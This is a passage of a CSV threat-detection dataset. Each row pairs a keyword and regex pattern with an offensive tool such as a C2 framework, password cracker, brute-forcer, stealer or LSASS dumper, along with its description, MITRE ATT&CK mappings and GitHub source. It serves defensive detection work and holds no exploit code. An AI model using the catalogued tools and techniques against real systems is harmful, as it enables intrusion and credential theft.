T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*WMIReg.exe*",".{0,1000}WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*wmispawn select*",".{0,1000}wmispawn\sselect.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*WmiSploit.git*",".{0,1000}WmiSploit\.git.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*WmiSploit-master/zip*",".{0,1000}WmiSploit\-master\/zip.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*WNFarmDynamite_h.cs*",".{0,1000}WNFarmDynamite_h\.cs.{0,1000}","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*word_gen_b_varlen.*",".{0,1000}word_gen_b_varlen\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*word_unc_injector.*",".{0,1000}word_unc_injector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Wordlist/ftp_p.txt*",".{0,1000}Wordlist\/ftp_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ftp_u.txt*",".{0,1000}Wordlist\/ftp_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ftp_up.txt*",".{0,1000}Wordlist\/ftp_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/mssql_up.txt*",".{0,1000}Wordlist\/mssql_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/mysql_up.txt*",".{0,1000}Wordlist\/mysql_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/oracle_up.txt*",".{0,1000}Wordlist\/oracle_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/pass.txt*",".{0,1000}Wordlist\/pass\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/pop_p.txt*",".{0,1000}Wordlist\/pop_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/pop_u.txt*",".{0,1000}Wordlist\/pop_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/postgres_up.txt*",".{0,1000}Wordlist\/postgres_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/smtp_p.txt*",".{0,1000}Wordlist\/smtp_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/smtp_u.txt*",".{0,1000}Wordlist\/smtp_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/snmp.txt*",".{0,1000}Wordlist\/snmp\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/sql_p.txt*",".{0,1000}Wordlist\/sql_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/sql_u.txt*",".{0,1000}Wordlist\/sql_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ssh_p.txt*",".{0,1000}Wordlist\/ssh_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ssh_u.txt*",".{0,1000}Wordlist\/ssh_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/ssh_up.txt*",".{0,1000}Wordlist\/ssh_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/telnet_p.txt*",".{0,1000}Wordlist\/telnet_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/telnet_u.txt*",".{0,1000}Wordlist\/telnet_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/telnet_up.txt*",".{0,1000}Wordlist\/telnet_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/user.txt*",".{0,1000}Wordlist\/user\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/vnc_p.txt*",".{0,1000}Wordlist\/vnc_p\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/windows_u.txt*",".{0,1000}Wordlist\/windows_u\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*Wordlist/windows_up.txt*",".{0,1000}Wordlist\/windows_up\.txt.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*wordlist_TLAs.txt*",".{0,1000}wordlist_TLAs\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--wordlist=*-passwords.txt*",".{0,1000}\-\-wordlist\=.{0,1000}\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*wordlist-nthash-reversed*",".{0,1000}wordlist\-nthash\-reversed.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*wordlist-probable.txt*",".{0,1000}wordlist\-probable\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wordlists*all_in_one.7z*",".{0,1000}wordlists.{0,1000}all_in_one\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*wordlists*rmg.txt*",".{0,1000}wordlists.{0,1000}rmg\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*wordlists*rmiscout.txt*",".{0,1000}wordlists.{0,1000}rmiscout\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*wordlists/dynamic-all.txt*",".{0,1000}wordlists\/dynamic\-all\.txt.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*wordlists/fasttrack.txt*",".{0,1000}wordlists\/fasttrack\.txt.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","4","330","48","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" "*wordlists/rockyou.txt'*",".{0,1000}wordlists\/rockyou\.txt\'.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*wordlists/subdomains-5000.txt*",".{0,1000}wordlists\/subdomains\-5000\.txt.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*wordlists/top1million.txt*",".{0,1000}wordlists\/top1million\.txt.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*WorldWind Stealer.zip*",".{0,1000}WorldWind\sStealer\.zip.{0,1000}","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","14","2","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" "*WorldWind-Stealer*",".{0,1000}WorldWind\-Stealer.{0,1000}","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","14","2","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z" "*wpapcap2john.*",".{0,1000}wpapcap2john\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*wp-exploitable-plugins.txt*",".{0,1000}wp\-exploitable\-plugins\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*wpscan ?url*",".{0,1000}wpscan\s\?url.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web Attacks","https://github.com/wpscanteam/wpscan","1","0","N/A","N/A","10","8243","1236","2024-04-25T16:50:24Z","2012-07-11T20:27:47Z" "*wpscan --api-token *",".{0,1000}wpscan\s\-\-api\-token\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*wpscanteam/wpscan*",".{0,1000}wpscanteam\/wpscan.{0,1000}","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web Attacks","https://github.com/wpscanteam/wpscan","1","1","N/A","N/A","10","8243","1236","2024-04-25T16:50:24Z","2012-07-11T20:27:47Z" "*Wr173F0rF113(*",".{0,1000}Wr173F0rF113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Wra7h/SingleDose*",".{0,1000}Wra7h\/SingleDose.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*wraith-labs/wraith*",".{0,1000}wraith\-labs\/wraith.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*wrap_execute_assembly*",".{0,1000}wrap_execute_assembly.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*wrap_execute_encoded_powershell*",".{0,1000}wrap_execute_encoded_powershell.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*wrap_get_clipboard*",".{0,1000}wrap_get_clipboard.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*wrap_inject_shellc*",".{0,1000}wrap_inject_shellc.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*wrap_load_memfd*",".{0,1000}wrap_load_memfd.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*wrap_unhook_ntdll*",".{0,1000}wrap_unhook_ntdll.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Write Dll buffer into remote memory*",".{0,1000}Write\sDll\sbuffer\sinto\sremote\smemory.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*write_cs_teamserver*",".{0,1000}write_cs_teamserver.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*write_payload_dll_transacted*",".{0,1000}write_payload_dll_transacted.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*write_what_where.py*",".{0,1000}write_what_where\.py.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","243","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" "*WriteAndExecuteShellcode*",".{0,1000}WriteAndExecuteShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus 